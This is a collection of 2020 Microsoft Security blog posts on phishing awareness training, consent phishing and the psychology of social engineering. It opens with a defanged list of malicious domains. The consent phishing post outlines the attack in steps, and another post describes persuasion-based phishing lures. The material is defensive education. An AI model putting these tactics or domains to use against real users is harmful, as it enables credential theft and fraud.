extasiatny[.]us darkinjtat[.]us pastorsta[.]us sategnaxf[.]us
mordiquedp[.]us mogulanbub[.]us aleesexx[.]us strekktumgz[.]us
kresanike[.]us oberhirtesn[.]us wyddiongw[.]us etherviltjd[.]us
gdinauq[.]us tumisolcv[.]us oardbzta[.]us zamislimrx[.]us
tidifkil[.]us anwirbtda[.]us breliaattainoqt[.]us steinzeitps[.]us
grafoay[.]us shuramiok[.]us sanarteau[.]us jerininomgv[.]us
kusturirp[.]us tenisaragonpu[.]us terquezajf[.]us remularegf[.]us
nobanior[.]us julijmc[.]us dekrapp[.]us odaljenakd[.]us

 

The post What tracking an attacker email infrastructure tells us about persistent cybercriminal operations appeared first on Microsoft Security.

Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity

December 16th, 2020 No comments

The Terranova Security annual Gone Phishing Tournament™ wrapped up in October 2020, spanning 98 countries and industries including healthcare, consumer goods, transport, energy, IT, finance, education, manufacturing, and more. Using templates created from actual phishing attacks created by Microsoft Security, Terranova Security Awareness Training draws on principles of behavioral science to create content that changes user behavior. True to our mission, this year’s results reveal a lot about the state of cybersecurity at the human level—your organization’s first line of defense.

Tournament results

Terranova Security’s Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October to coincide with National Cybersecurity Awareness Month. The Tournament tests real-world responses using a phishing email modeled on actual threats provided by Attack Simulation Training in Microsoft Defender for Office 365 (Office 365 Advanced Threat Protection). Click rates are segmented by industry, organization size, region, web browser, and operating system.

Using a template created from real phishing attacks, translated into 11 languages across 98 countries, the 2020 Gone Phishing Tournament revealed that organizations are taking phishing threats seriously, but with mixed results.

“There’s increasing crossover between our personal and work activities online. That’s why cybersecurity education and training needs to be an ongoing commitment.”—Vasu Jakkal, CVP, Security, Compliance and Identity Marketing, Microsoft

Password submission by industry

Figure 1: Password submission by industry

The average password submission rate across industries was 13.4 percent, with education employees taking the bait least often at just 7.9 percent. The highest password submission rate was among public sector employees at 20.7 percent.

Click and password submission rates by the size of the organization

Figure 2: Click and password submission rates by the size of the organization

The tournament results also showed there was not a great deal of variation when comparing organizations of varied sizes. For example, there was only a 9.2 percent difference in the number of people who clicked the phishing link and submitted passwords at organizations of fewer than 100 people, compared with those consisting of more than 3,000 employees. The results show that phishing attacks are not just a threat for smaller organizations with less sophisticated cybersecurity training—large organizations were even more vulnerable.

Ongoing attacks

In the new world of remote work, your people are your perimeter. Phishing provides hackers with a low-cost, low-risk form of social engineering with a potentially big payoff in the form of stolen passwords, leaked credentials, and access to sensitive data and intellectual property. Throughout 2020, opportunistic cybercriminals have been preying on distracted, overstressed remote workers by introducing COVID-19-themed phishing lures. The World Health Organization (WHO) has referred to the ongoing COVID-19 themed phishing attacks as an “infodemic.” By the summer of 2020, the Federal Trade Commission (FTC) had already recorded over 59,000 coronavirus or stimulus-related complaints resulting in over $74 million in losses.

The National Cyber Security Alliance (NCSA) is pushing back against the rise in cybercrime by building strong public and private partnerships that empower users to stay secure online.

“The Phishing Benchmark Global Report reinforces the need for the current work being done by organizations like Microsoft, Terranova Security, and the National Cyber Security Alliance. Real-world phishing simulations and engaging security awareness training help make organizations, employees, and everyday citizens aware of the growing risk of social engineering and phishing emails. We will continue working in partnership with industry and government to empower the global community towards becoming one that is more cyber aware.”—Kelvin Coleman, Executive Director of NCSA

Not all security awareness training is alike

To defend against increasingly sophisticated cyber threats, organizations need real-world training as a comprehensive internal campaign. Terranova Security Awareness Training includes gamification and interactive sessions designed to engage and can be localized to different geographies around the world.

Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, integrates simulations, training, and reporting. Terranova Security is excited to partner with Microsoft to deliver this differentiated, industry-leading solution, allowing our customers to detect, prioritize, and remediate phishing risk across their organizations. With Attack simulation training, customers can:

  • Simulate real threats: Detect vulnerabilities with real lures and templates—automatically or manually send employees the phishing emails attackers have used against your organization. Then, reach out to users who fall for a phishing lure with personalized training content.
  • Remediate intelligently: Quantify social engineering risks across employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impacts. Using user susceptibility metrics triggers automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human security system with targeted training designed to change employee behavior. Training can be customized and localized, including simulations tailored to your employee’s contexts—region, industry, function—with granular conditionality on harvesting. Cater to diverse learning styles with interactive nano-learning and micro-learning content.

If there is a common thread to be found in this year’s Gone Phishing Tournament results, it is that organizations of every size need to make integrated attack simulation and training a cornerstone of their cybersecurity program. Cybercriminals do not take days off, and neither should your simulation and training program.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity appeared first on Microsoft Security.

Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security

October 5th, 2020 No comments

Phishing is still one of the most significant risk vectors facing enterprises today. Innovative email security technology like Microsoft Defender for Office 365 stops a majority of phishing attacks before they hit user inboxes, but no technology in the world can prevent 100 percent of phishing attacks from hitting user inboxes. At that point in time, your employees become your defenders. They must be trained to recognize and report phishing attacks. But not all training is equally proficient.

This blog examines the current state of security awareness training, including how you can create an intelligent solution to detect, analyze, and remediate phishing risk. You’ll also learn about an upcoming event to help you get data-driven insights to compare your current phishing risk level against your peers.

A new reality for cybersecurity

The Chief Information Security Officer (CISO) at a modern enterprise must contend with a myriad of threats. The hybrid mix of legacy on-premises systems and cloud solutions, along with the proliferation of employee devices and shadows, means your security team needs a new and comprehensive view of phishing risk across the organization. Self-reported training completion metrics don’t provide insights into behavior changes or risk reduction, leading CISOs to distrust these metrics. Improvement in employee behavior becomes difficult to measure, leaving them anxious that employee behavior has improved at all.

Many information workers view security awareness training as a tedious interruption that detracts from productivity. Often when an employee is compromised during a simulated attack, they find the ensuing training to be punitive and navigate away from the training like nothing happened. Worse, simulations are often out-of-context and don’t make sense for the employee’s industry or function.

People-centric protection

Making secure behaviors a part of people’s daily habits requires a regular program of targeted education combined with realistic simulations. That means regular breach and attack simulations against endpoints, networks, and cloud security controls. Microsoft Defender for Office 365 now features simulations to help you detect and remediate phishing risks across your organization. Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, helps you gain visibility over organizational risk, the baseline against predicted compromise rates, and prioritize remediations. To learn more about this capability, watch the product launch at Microsoft Ignite 2020

Terranova Security employs a pedagogical approach to cybersecurity, including gamification and interactive sessions designed to engage users’ interest. The simulations are localized for employees around the world and follow the highest web content accessibility guidelines (WCAG) 2.1. You will be able to measure employee behavior changes and deploy an integrated, automated security awareness program built on three pillars of protection:

  • Simulate real threats: Detect vulnerabilities by using real lures (actual phishing emails) and templates, training employees on the most up-to-date threats. Administrators can automate and customize simulations, including payload attachment, user targeting, scheduling, and cleanup. Azure Active Directory (AAD) groups automate user importing, and the vast library of training content enables personalized training based on a user’s vulnerability score or simulation performance.
  • Remediate intelligently: Quantify your social engineering risk across employees and threat vectors to accurately target remedial training. Measure the behavioral impact and track your organization’s progress against a baseline compromise rate. Set up automated repeat offender simulations with the user susceptibility metric and add context by correlating behavior with a susceptibility score.
  • Improve your security posture: Reinforce your human security system with hyper-targeted training designed to change employee Attack Simulation Training in Microsoft Defender for Office 365 provides nano learnings and micro learnings” to cater to diverse learning styles to reinforce awareness.

Check your threat level

Coinciding with National Cyber Security Awareness Month (NCSAM),  Terranova will release the results at the end of October from their the Terranova Security Gone Phishing Tournament™. This popular event helps security leaders get an up-to-the-minute picture of their organization’s phishing click rate. Terranova launched this campaign back in August and supplied a free phishing simulation for its applicants and enabled them to benchmark themselves against their peers, giving them accurate click-rate data for comparison.

Co-sponsored by Microsoft, the Terranova Security Gone Phishing Tournament uses an email template from Attack simulation training—a new capability of Office 365 ATP releasing later this year—that acts as an intelligent social engineering risk management tool using context-aware simulations and targeted training.

To learn more about Microsoft Security solutions, visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security appeared first on Microsoft Security.

Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise

September 29th, 2020 No comments

Today, Microsoft is releasing a new annual report, called the Digital Defense Report, covering cybersecurity trends from the past year. This report makes it clear that threat actors have rapidly increased in sophistication over the past year, using techniques that make them harder to spot and that threaten even the savviest targets. For example, nation-state actors are engaging in new reconnaissance techniques that increase their chances of compromising high-value targets, criminal groups targeting businesses have moved their infrastructure to the cloud to hide among legitimate services, and attackers have developed new ways to scour the internet for systems vulnerable to ransomware.

In addition to attacks becoming more sophisticated, threat actors are showing clear preferences for certain techniques, with notable shifts towards credential harvesting and ransomware, as well as an increasing focus on Internet of Things (IoT) devices. Among the most significant statistics on these trends:

  • In 2019 we blocked over 13 billion malicious and suspicious mails, out of which more than 1 billion were URLs set up for the explicit purpose of launching a phishing credential attack.
  • Ransomware is the most common reason behind our incident response engagements from October 2019 through July 2020.
  • The most common attack techniques used by nation-state actors in the past year are reconnaissance, credential harvesting, malware, and Virtual Private Network (VPN) exploits.
  • IoT threats are constantly expanding and evolving. The first half of 2020 saw an approximate 35% increase in total attack volume compared to the second half of 2019.

Given the leap in attack sophistication in the past year, it is more important than ever that we take steps to establish new rules of the road for cyberspace; that all organizations, whether government agencies or businesses, invest in people and technology to help stop attacks; and that people focus on the basics, including regular application of security updates, comprehensive backup policies, and, especially, enabling multi-factor authentication (MFA).  Our data shows that enabling MFA would alone have prevented the vast majority of successful attacks.

To read the full blog and download the Digital Defense Report visit the Microsoft On-the-issues Blog.

CTA: To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise appeared first on Microsoft Security.

Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training

September 24th, 2020 No comments

Everyone knows about phishing scams, and most of us think we’re too smart to take the bait. Our confidence often reaches superhero levels when we’re logged onto a company network. As Chief Security Advisor for Microsoft, and previously at telco Swisscom, it’s my business to understand how well employees adapt security training into their daily routines. Years of experience have taught me there are commonalities in human behavior that cut across all levels of an organization. Above all, people want to trust the company they work for and the communications they receive. It’s our task to help them understand that yes, their employer is looking out for them, but they also need to be vigilant to protect themselves and their company’s private data.

Tip #1: Make it fun. That means creating training modules that people will actually want to watch. Think of your favorite TV shows. There’s a reason you want to binge every episode. You care about the characters, or you’re at least interested in how their dilemmas work out. A good example is the Fox TV show 24; every episode was one hour in an unfolding storyline with high stakes. Your training program doesn’t need life-or-death consequences, but it should give people a reason to watch beyond just checking a box for compliance.

Tip #2: Make it easy. Your end-user is your customer; so, you need them to buy-in. When investigating new security solutions, I ask: “Could you explain how this works to my mother in thirty minutes or less?” If not, it’s probably not a user-friendly solution. Asking people to create a password with 20 characters consisting of random symbols, cases, and numbers (that they shouldn’t write down) is not easy. For a better option, try passwordless authentication options for Azure Active Directory. If your organization has  Microsoft Defender for Office 365 Plan 2, which includes Threat Investigation and Response capabilities, you can employ Attack Simulator in the Security & Compliance Center to run realistic scenarios. These simulated attacks can help you easily identify vulnerable users before a real attacker comes knocking.

Tip #3: Focus on your highest risk. Nearly one in three security breaches starts with a phishing attack costing the affected organization an average of USD1.4 million. Even after security training, employees still click on phishing links at an average rate of 20 – 30 percent. With the rise in people working from home, new forms, such as consent phishing, have cropped up to take advantage of new vulnerabilities. Direct your resources to where the people in your organization can see the risk is real, and you’ll generate positive engagement.

Tip #4: Be transparent about breaches. No organization can claim 100 percent invulnerability. Let people know they are the first line of defense. Communicating with staff when a successful attack occurs will help them remain alert. It’s okay to provide examples as long as you don’t reveal so much information that it’s obvious who clicked on that fake Zoom invitation. Be careful not to treat employees like children. They need to own their own actions, but shaming won’t make your organization safer.

Tip #5: Avoid a compliance only mindset. Yes, that once-a-year cybersecurity training your people dutifully click through meets the organizational requirement. But gaining employee buy-in means doing more than just checking the box. Schedule a refresher course after a breach, even if the victim happens to be another company. Creating a security program that’s fun and engaging will probably cost more, but ask yourself how high the costs from downtime and lost productivity from a major breach would run. Better to invest those funds in protection upfront.

Tip #6: Communicate and educate continuously. Make security news part of your normal staff communications. Talk to your people about the headline-making hacks that target large corporations and government agencies, as well as the smaller identity theft and payment-app scams we all contend with. Talk about supply chain security and the dangers of using unauthorized devices and shadow IT. Cybersecurity threats can feel overwhelming and scary. Communication helps demystify those threats and makes employees feel empowered to protect themselves and their organizations.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training appeared first on Microsoft Security.

Categories: Azure Security, cybersecurity, phishing Tags:

How can Microsoft Threat Protection help reduce the risk from phishing?

August 26th, 2020 No comments

Microsoft Threat Protection can help you reduce the cost of phishing

The true cost of a successful phishing campaign may be higher than you think. Although phishing defenses and user education have become common in many organizations, employees still fall prey to these attacks. This is a problem because phishing is often leveraged as the first step in other cyberattack methods. As a result, its economic impact remains hidden. Understanding how these attacks work is key to mitigating your risk.

One reason phishing is so insidious is that attackers continuously evolve their methods. In this blog, I’ve described why you need to take phishing seriously and how different phishing methods work. You’ll also find links to Microsoft Threat Protection solutions that can help you reduce your risk.

Nearly 1 in 3 attacks involve phishing

According to Accenture’s Ninth Annual Cost of Cybercrime Study, phishing attacks cost the average organization USD1.4 million in 2018, an eight percent rise over 2017. This likely underestimates the cost because the report only considers four major consequences when determining the cost of an attack: business disruption, information loss, revenue loss, and equipment damage. However, phishing is used as the delivery method for several other attacks, including business email compromise, malware, ransomware, and botnet attacks. The 2019 Verizon Data Breach Report finds that almost one in three attacks involved phishing. And according to the 2019 Internet Crime Complaint Center, phishing/vishing/smishing/pharming are the most common methods for scamming individuals online.

Since the costs of other attacks can often be attributed to phishing, a comprehensive cyber risk mitigation strategy should place a high value on phishing defenses and user education.

Phishing campaigns can be well-targeted and sophisticated

As attackers have developed new methods to evade detection by defenders and victims, phishing has transformed. Phishing now uses mediums other than email, including voicemail, instant messaging, and collaboration platforms, as people have enhanced email-based defenses, but may have not considered these other attack vectors. The success of phishing as the delivery of other cyberattacks makes it critically important for defenders to be able to identify the many types of phishing and how to defend against them, including:

  • Mass market phishing: When you think of phishing this is likely what comes to mind. These emails go out to a large group of people and use a generic message to trick users into clicking a link or downloading a file. Attacks often use email spoofing, so that the message appears to come from a legitimate source.
  • Spear phishing: Spear phishing is a more targeted social engineering method. Attackers pick an individual, such as a global administrator or an HR professional, conduct research, and then craft an email that makes use of that research to dupe the victim.
  • Whaling: These emails target someone on the executive team. Like spear phishing, these attacks start with research, which the attacker uses to write an email that appears legitimate.
  • Business-email compromise: In these attacks, adversaries compromise an executive’s account, such as the CEO, and then use that account to ask a direct report to wire money.
  • Clone phishing: Attackers clone a legitimate email and then change the link or attachment.
  • Vishing: Vishing is a phishing attempt using the phone. Victims are asked to call back and enter a PIN number or account number.

Fahmida Y. Rashid provides more details about these type of phishing attacks on CSO.

An emerging phishing method exploits the increase in remote work

Recently, another phishing type was identified called consent phishing. In response to COVID-19, people have increased their usage of cloud apps and mobile devices to facilitate work from home. Bad actors have taken advantage of this shift by leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. By using application prompts similar to that on mobile devices, they trick victims into allowing the malicious applications permission to access services and data (see Figure 2).

An image showing the Microsoft "Permissions requested" dialogue.

Figure 1: Familiar application prompts trick users into giving malicious apps access to services and data.

The following best practices can help you defend against this new threat:

  • Educate your organization on how to identify a consent phishing message. Poor spelling and grammar are two indicators that the request isn’t legitimate. Users may also notice that the URL doesn’t quite look right.
  • Promote and allow access to apps you trust. Use publisher verified to identify apps that have been validated by the Microsoft platform. Configure application consent policies, so employees are guided to applications you trust.
  • Educate your organization on how permissions and consent framework works in the Microsoft platform.

Office 365 Advanced Threat Protection helps prevent and remediate phishing attacks

Office 365 Advanced Threat Protection (Office 365 ATP), natively protects all of Office 365 against advanced attacks. The service leverages industry-leading intelligence fueled by trillions of signals to continuously evolve to prevent emerging threats, like phishing and impersonation attacks. As part of Microsoft Threat Protection, Office 365 ATP provides security teams with the tools to investigate and remediate these threats, and integrates with other Microsoft Threat Protection products like Microsoft Defender Advanced Threat Protection and Azure Advanced Threat Protection to help stop cross-domain attacks spanning email, collaboration tools, endpoints, identities, and cloud apps.

Microsoft Threat Protection increases analyst efficiency

Microsoft Threat Protection stops attacks across Microsoft 365 services and auto-heals affected assets. It leverages the Microsoft 365 security portfolio to automatically analyze threat data across identities, endpoints, cloud applications, and email and docs. By fusing related alerts into incidents, defenders can respond to threats and attacks immediately and in their entirety, saving precious time. (see Figure 3).

The following actions will help you gain greater visibility into attacks to protect your organization.

An image of : Microsoft Threat Protection and Office 365 ATP provide several capabilities to help you protect your organization from phishing attacks.

Figure 2: Microsoft Threat Protection and Office 365 ATP provide several capabilities to help you protect your organization from phishing attacks.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How can Microsoft Threat Protection help reduce the risk from phishing? appeared first on Microsoft Security.

How to detect and mitigate phishing risks with Microsoft and Terranova Security

August 25th, 2020 No comments

Detect, assess, and remediate phishing risks across your organization

A successful phishing attack requires just one person to take the bait. That’s why so many organizations fall victim to these cyber threats. To reduce this human risk, you need a combination of smart technology and people-centric security awareness training. But if you don’t understand your vulnerabilities, it can be difficult to know where to start.  Attack simulation training capabilities in Office 365 Advanced Threat Protection (Office 365 ATP) empower you to detect, assess, and remediate phishing risk through an integrated phish simulation and training experience. And, in October 2020, you can get true phishing clickthrough benchmarks when you register for the Terranova Security Gone Phishing TournamentTM.

Terranova Security is a global leader in cybersecurity awareness training that draws on principles of behavioral science to create training content that changes user behavior. Through a partnership with Microsoft, Terranova Security is able to enrich our training programs with insights from the Microsoft platform, while Microsoft leverages our content and technology in Microsoft Office 365 Advanced Threat Protection (Office 365 ATP).

Today’s blog shares how the Gone Phishing Tournament helps you baseline against your industry and peers, and how Office 365 ATP Attack Simulation training can help you mitigate the risk of a phishing-related data breach.

How does your risk of being phished stack up?

Cybercriminals exploit human psychology to trick users, which is why they introduced COVID-19-themed phishing lures in the early days of the pandemic. Many employees are working from home for the first time and have children and other family members competing for their attention. Bad actors hope to trick employees when they are busy and stressed. Although it’s understandable why people accidentally act on phishing campaigns, there is an opportunity to turn your employees into your first line of defense. When people understand how phishing campaigns work, your organization is more secure.

An image showing typical malware campaigns before and after.

 

The Gone Phishing Tournament will give you valuable insight into how well employees understand phishing. The Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October. The tournament leverages a phishing email based on real-world threats provided by Attack simulation training in Office 365 ATP and localizes it for your audience. After you register, you can select the users you want to include in the phishing simulation. We run the simulation for a set number of days using the same template, so you get an accurate assessment of how you compare to peer organizations. At the end of the tournament, you’ll receive a personalized click report and a global benchmarking report.

Empower employees to defend against phishing threats

Phishing simulations are a great way to educate employees about phishing threats, but to shift behavior you need a regular program that includes targeted education alongside simulations. Terranova Security’s awareness training, which will soon be available in Office 365 ATP, takes a pedagogical approach with gamification and interactive sessions designed to engage adults. It is localized for employees around the world and complies with web content accessibility guidelines (WCAG) 2.0.

Later this year, Office 365 ATP Attack Simulator and Training will launch integrated with Terranova Security awareness training. You’ll be able to take advantage of comprehensive training benefits that will help you measure behavior change and automate design and deployment of an integrated security awareness training program:

  • Simulate real threats: Detect vulnerabilities with real lures and templates for accurate risk assessment. By automatically or manually sending employees the same emails that attackers have used against your organization, you can uncover risk. Then, target users who fall for phish with personalized training content that helps them connect what they learned with real-world campaigns.
  • Remediate intelligently: Quantify social engineering risk across your employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impact of training. Using user susceptibility metrics, you can trigger automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human firewall with hyper-targeted training designed to change employee behavior. Training can be customized and localized to meet the diverse needs of employees. Tailor simulations to your employee’s contexts—region, industry, function—with granular conditionality on harvesting. You can also cater to diverse learning styles and reinforce awareness with interactive nano learning and microlearning content.

In the new world of remote work, it has become clear that your people are your perimeter. Attack simulation training in Office 365 ATP, delivered in partnership with Terranova Security can help you identify vulnerable users and deliver targeted, engaging education that empowers them to defend against the latest phishing threats.   Look for a future blog from me in the beginning of cybersecurity awareness month that will discuss in more detail how to train your employees on security. In the meantime, register for Terranova Security Gone Phishing Tournament October 2020.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to detect and mitigate phishing risks with Microsoft and Terranova Security appeared first on Microsoft Security.

Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity

August 5th, 2020 No comments

Most of us know ‘Improv’ through film, theatre, music or even live comedy. It may surprise you to learn that the skills required for improvisational performance art, can also make you a good hacker? In cybersecurity, while quite a bit of focus is on the technology that our adversaries use, we must not forget that most cybersecurity attacks start with a non-technical, social engineering campaign—and they can be incredibly sophisticated. It is how attackers were able to pivot quickly and leverage COVID themed lures wreak havoc during the onset of the global pandemic. To dig into how social attacks like these are executed, and why they work time and again, I spoke with Rachel Tobac on a recent episode Afternoon Cyber Tea with Ann Johnson.

Rachel Tobac is the CEO of SocialProof Security and a white-hat hacker, who advises organizations on how to harden their defenses against social engineering. Her study of neuroscience and Improv have given her deep insight into how bad actors use social psychology to convince people to break policy. I really appreciate how she is able to break down the steps in a typical social engineering campaign to illustrate how people get tricked.

In our conversation, we also talked about why not all social engineering campaigns feel “phishy.” Hackers are so good at doing research and building rapport that the interaction often feels legitimate to their targets. However, there are techniques you can use, like multi-factor authentication and two-factor communication, to reduce your risk. We also discussed emerging threats, like deep fake videos, attacks on critical infrastructure, and how social engineering techniques could be used against driverless cars. To learn why you should take social engineering seriously and how to protect your organization, listen to Afternoon Cyber Tea with Ann Johnson: Revisiting social engineering: The human threat to cybersecurity on Apple Podcasts or Podcast One.

What’s next

In this important cyber series, I talk with cybersecurity influencers about trends shaping the threat landscape and explore the risk and promise of systems powered by AI, Internet of Things (IoT), and other emerging tech.

You can listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts — You can also download the episode by clicking the Episode Website link.
  • Podcast One — Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page — Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

To find out more information on Microsoft Security Solutions visit our website. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity appeared first on Microsoft Security.

Protecting your remote workforce from application-based attacks like consent phishing

July 8th, 2020 No comments

The global pandemic has dramatically shifted how people work. As a result, organizations around the world have scaled up cloud services to support collaboration and productivity from home. We’re also seeing more apps leverage Microsoft’s identity platform to ensure seamless access and integrated security as cloud app usage explodes, particularly in collaboration apps such as Zoom, Webex Teams, Box and Microsoft Teams. With increased cloud app usage and the shift to working from home, security and how employees access company resources are even more top of mind for companies.

While application use has accelerated and enabled employees to be productive remotely, attackers are looking at leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. While you may be familiar with attacks focused on users, such as email phishing or credential compromise, application-based attacks, such as consent phishing, is another threat vector you must be aware of.  Today we wanted to share one of the ways application-based attacks can target the valuable data your organization cares about, and what you can do today to stay safe.

Consent phishing: An application-based threat to keep an eye on

Today developers are building apps by integrating user and organizational data from cloud platforms to enhance and personalize their experiences. These cloud platforms are rich in data but in turn have attracted malicious actors seeking to gain unwarranted access to this data. One such attack is consent phishing, where attackers trick users into granting a malicious app access to sensitive data or other resources. Instead of trying to steal the user’s password, an attacker is seeking permission for an attacker-controlled app to access valuable data.

While each attack tends to vary, the core steps usually look something like this:

  1. An attacker registers an app with an OAuth 2.0 provider, such as Azure Active Directory.
  2. The app is configured in a way that makes it seem trustworthy, like using the name of a popular product used in the same ecosystem.
  3. The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or other techniques.
  4. The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
  5. If a user clicks accept, they will grant the app permissions to access sensitive data.
  6. The app gets an authorization code which it redeems for an access token, and potentially a refresh token.
  7. The access token is used to make API calls on behalf of the user.

If the user accepts, the attacker can gain access to their mail, forwarding rules, files, contacts, notes, profile and other sensitive data and resources.

An image of a Consent screen from a sample malicious app named “Risky App."

Consent screen from a sample malicious app named “Risky App”

How to protect your organization

At Microsoft, our integrated security solutions from identity and access management, device management, threat protection and cloud security enable us to evaluate and monitor trillions of signals to help identify malicious apps. From our signals, we’ve been able to identify and take measures to remediate malicious apps by disabling them and preventing users from accessing them. In some instances, we’ve also taken legal action to further protect our customers.

We’re also continuing to invest in ways to ensure our application ecosystem is secure by enabling customers to set policies on the types of apps users can consent to as well as highlighting apps that come from trusted publishers. While attackers will always persist, there are steps you can take to further protect your organization. Some best practices to follow include:

  • Educate your organization on consent phishing tactics:
    • Check for poor spelling and grammar. If an email message or the application’s consent screen has spelling and grammatical errors, it’s likely to be a suspicious application.
    • Keep a watchful eye on app names and domain URLs. Attackers like to spoof app names that make it appear to come from legitimate applications or companies but drive you to consent to a malicious app. Make sure you recognize the app name and domain URL before consenting to an application.
  • Promote and allow access to apps you trust:
    • Promote the use of applications that have been publisher verified. Publisher verification helps admins and end-users understand the authenticity of application developers. Over 660 applications by 390 publishers have been verified thus far.
    • Configure application consent policies by allowing users to only consent to specific applications you trust, such as application developed by your organization or from verified publishers.
  • Educate your organization on how our permissions and consent framework works:

The increased use of cloud applications has demonstrated the need to improve application security. At Microsoft, we’re committed to building capabilities that proactively protect you from malicious apps while giving you the tools to set policies that balance security and productivity. For additional best practices and safeguards review the Detect and Remediate Illicit Consent Grants in Office 365 and Five steps to securing your identity infrastructure.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protecting your remote workforce from application-based attacks like consent phishing appeared first on Microsoft Security.

The psychology of social engineering—the “soft” side of cybercrime

June 30th, 2020 No comments

Forty-eight percent of people will exchange their password for a piece of chocolate,[1] 91 percent of cyberattacks begin with a simple phish,[2] and two out of three people have experienced a tech support scam in the past 12 months.[3] What do all of these have in common? They make use of social engineering: when an attacker preys on our human nature in order to defraud. Also in common, these small, very human actions have led to billions of dollars of loss to global business.

People are by nature social. Our decision making is highly influenced by others. We are also overloaded with information and look to shortcuts to save time. This is why social engineering is so effective. In this blog, I’ll share the psychology behind Cialdini’s Six Principles of Persuasion to show how they help lure employees and customers into social engineering hacks. And I’ll provide some tips for using those principles to create a social engineering resistant culture.

Dr. Robert Cialdini is Regents’ Professor Emeritus of Psychology and Marketing at Arizona State University and founder of Influence at Work. He has spent his entire career studying what makes people say “Yes” to requests. From that research he developed Six Principles of Persuasion: Reciprocity, Scarcity, Authority, Consistency, Liking, and Consensus. So let’s take a look at how each of these principles is used in social engineering campaigns and how you can turn them around for good.

Reciprocity

People are inclined to be fair. In fact, receiving a gift triggers a neurological response in the areas of the brain associated with decision-making. If my friend buys me lunch on Friday, I will feel obliged to buy her lunch the next time we go out. Social psychologists have shown that if people receive a holiday card from a stranger, 20 percent will send one back.[4] And providing a mint at the end of a meal can increase tipping by 18-21 percent.

How reciprocity is used in phishing: You can see evidence of the Principle of Reciprocity in phishing campaigns and other scams. For example, an attacker may send an email that includes a free coupon and then ask the user to sign up for an account.

Leveraging reciprocity to reduce phishing: According to Dr. Cialdini, the lesson of “the Principle of Reciprocity is to be the first to give...” Many organizations pay for lunch to get people to come to trainings, but you may also consider giving away gift certificates for coffee or a fun T-shirt. If the gift is personal and unexpected, it’s even more effective. After you give, ask people to commit to your security principles. Many will feel compelled to do so.

Scarcity

Why do so many travel websites tell you when there are only a few remaining flights or rooms? The Principle of Scarcity. It’s human nature to place a higher value on something that is in limited supply. In one experiment, college students judged cookies more appealing if there were fewer in the jar.[5] Even more appealing? When an abundant supply of cookies was later reduced to scarcity.

How scarcity is used in phishing: Attackers take advantage of our desire for things that seem scarce by putting time limits on offers in emails. Or, in another common tactic, they tell people that their account will deactivate in 24 hours if they don’t click on a link to get it resolved.

Leveraging scarcity to reduce phishing: You can leverage scarcity to engage people in security behaviors too. For example, consider giving a prize to the first 100 people who enable multi-factor authentication.

Authority

People tend to follow the lead of credible experts. Doctors (think Dr. Fauci), teachers, bosses, and political leaders, among others, have huge sway over people’s actions and behaviors. If you’ve heard of the Milgram study,[6] you may be familiar with this concept. In that study an experimenter convinced volunteers to deliver increasingly more severe shocks to a “learner” who didn’t answer questions correctly. Fortunately, the learner was an actor who pretended to feel pain, when in reality there were no shocks delivered. However, it does show you how powerful the Principle of Authority is.

How authority is used in phishing: Using authority figures to trick users is very common and quite effective. Bad actors spoof the Chief Executive Officer (CEO) to demand that the Chief Financial Officer (CFO) wire money quickly in some spear phishing campaigns. When combined with urgency, people are often afraid to say no to their boss.

Leveraging authority to reduce phishing: You can use people’s natural trust of authority figures in your security program. For example, have senior managers make a statement about how important security is.

Consistency

Most people value integrity. We admire honesty and reliability in others, and we try to practice it in our own lives. This is what drives the Principle of Consistency. People are motivated to remain consistent with prior statements or actions. If I tell you that I value the outdoors, I won’t want to be caught throwing litter in a park. One study found that if you ask people to commit to environmentally friendly behavior when they check into a hotel, they will be 25 percent more likely to reuse their towel.[7]

